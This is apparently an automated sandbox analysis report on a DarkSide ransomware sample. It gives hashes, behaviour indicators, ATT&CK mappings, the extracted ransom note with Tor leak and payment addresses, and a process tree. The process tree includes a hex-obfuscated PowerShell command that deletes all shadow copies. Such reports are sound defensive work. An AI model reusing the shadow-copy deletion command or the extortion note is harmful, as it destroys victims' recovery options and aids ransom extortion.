darkside | 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297

Analysis

max time kernel
143s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
19-01-2022 04:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DarkSide_18_11_2020_17KB.exe
Size

17KB
MD5

f87a2e1c3d148a67eaeb696b1ab69133
SHA1

d1dfe82775c1d698dd7861d6dfa1352a74551d35
SHA256

9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
SHA512

e361811b07a66d9a784be37bdace0bdec9e11374083d7ccf7d9830e47a59afa8b9d12d80d4d47ea1932116354ad60bbc8ea6a6a265885d264b35486986415ea3

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.abc0e8b2.TXT

Family

darkside

Ransom Note

----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 30 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

DarkSide_18_11_2020_17KB.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\SubmitWrite.tif => C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\WaitSkip.tif => C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\DenyAssert.png => C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\DenyUninstall.png => C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\PingEnable.tiff => C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromExit.tif => C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\GetDebug.tif => C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\CheckpointApprove.crw => C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromAdd.tiff	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromAdd.tiff => C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\RestoreRestart.raw => C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\UnregisterGrant.crw => C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\GroupReset.crw => C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\OptimizeUnblock.tif => C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\PingEnable.tiff	DarkSide_18_11_2020_17KB.exe
File renamed	C:\Users\Admin\Pictures\RegisterResume.png => C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2	DarkSide_18_11_2020_17KB.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2	DarkSide_18_11_2020_17KB.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

177 www.iplocation.net
238 www.iplocation.net

flow	ioc
177	www.iplocation.net
238	www.iplocation.net

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEchrome.exeEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 18 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{770F1BB0-78E5-11EC-82D0-DA616A59BCB7} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE

Modifies registry class 1 IoCs

Processes:

OpenWith.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings OpenWith.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

1812 EXCEL.EXE
2976 WINWORD.EXE
2976 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

DarkSide_18_11_2020_17KB.exepowershell.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
3708	DarkSide_18_11_2020_17KB.exe
3708	DarkSide_18_11_2020_17KB.exe
3200	powershell.exe
3200	powershell.exe
3708	DarkSide_18_11_2020_17KB.exe
3708	DarkSide_18_11_2020_17KB.exe
3712	chrome.exe
3712	chrome.exe
892	chrome.exe
892	chrome.exe
4044	chrome.exe
4044	chrome.exe
2496	chrome.exe
2496	chrome.exe
672	chrome.exe
672	chrome.exe
2700	chrome.exe
2700	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

3676 OpenWith.exe

pid	process
3676	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

Processes:

chrome.exe

pid	process
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

DarkSide_18_11_2020_17KB.exepowershell.exevssvc.exeAUDIODG.EXE

description	pid	process
Token: SeIncreaseQuotaPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeSecurityPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeTakeOwnershipPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeLoadDriverPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeSystemProfilePrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeSystemtimePrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeProfSingleProcessPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeIncBasePriorityPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeCreatePagefilePrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeBackupPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeRestorePrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeShutdownPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeDebugPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeSystemEnvironmentPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeRemoteShutdownPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeUndockPrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: SeManageVolumePrivilege	3708	DarkSide_18_11_2020_17KB.exe
Token: 33	3708	DarkSide_18_11_2020_17KB.exe
Token: 34	3708	DarkSide_18_11_2020_17KB.exe
Token: 35	3708	DarkSide_18_11_2020_17KB.exe
Token: 36	3708	DarkSide_18_11_2020_17KB.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeBackupPrivilege	3188	vssvc.exe
Token: SeRestorePrivilege	3188	vssvc.exe
Token: SeAuditPrivilege	3188	vssvc.exe
Token: 33	2096	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2096	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 61 IoCs

Processes:

iexplore.exechrome.exe

pid	process
3840	iexplore.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

chrome.exe

pid	process
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe
892	chrome.exe

Suspicious use of SetWindowsHookEx 30 IoCs

Processes:

EXCEL.EXEOpenWith.exeiexplore.exeIEXPLORE.EXEWINWORD.EXETextInputHost.exe

pid	process
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
1812	EXCEL.EXE
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3676	OpenWith.exe
3840	iexplore.exe
3840	iexplore.exe
2264	IEXPLORE.EXE
2264	IEXPLORE.EXE
2976	WINWORD.EXE
2976	WINWORD.EXE
2976	WINWORD.EXE
2976	WINWORD.EXE
2976	WINWORD.EXE
2976	WINWORD.EXE
2428	TextInputHost.exe
2428	TextInputHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

DarkSide_18_11_2020_17KB.exeOpenWith.exeiexplore.exechrome.exe

description	pid	process	target process
PID 3708 wrote to memory of 3200	3708	DarkSide_18_11_2020_17KB.exe	powershell.exe
PID 3708 wrote to memory of 3200	3708	DarkSide_18_11_2020_17KB.exe	powershell.exe
PID 3676 wrote to memory of 3840	3676	OpenWith.exe	iexplore.exe
PID 3676 wrote to memory of 3840	3676	OpenWith.exe	iexplore.exe
PID 3840 wrote to memory of 2264	3840	iexplore.exe	IEXPLORE.EXE
PID 3840 wrote to memory of 2264	3840	iexplore.exe	IEXPLORE.EXE
PID 3840 wrote to memory of 2264	3840	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1460	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 1460	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 2508	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3712	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3712	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe
PID 892 wrote to memory of 3680	892	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\NewSend.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1812

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\SubmitRename.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:2212

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3676

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\SubmitRename.hta
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3840

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3840 CREDAT:17410 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2264

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
PID:3112

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
2⤵
PID:1460

C:\Program Files\Google\Chrome\Application\chrome.exe
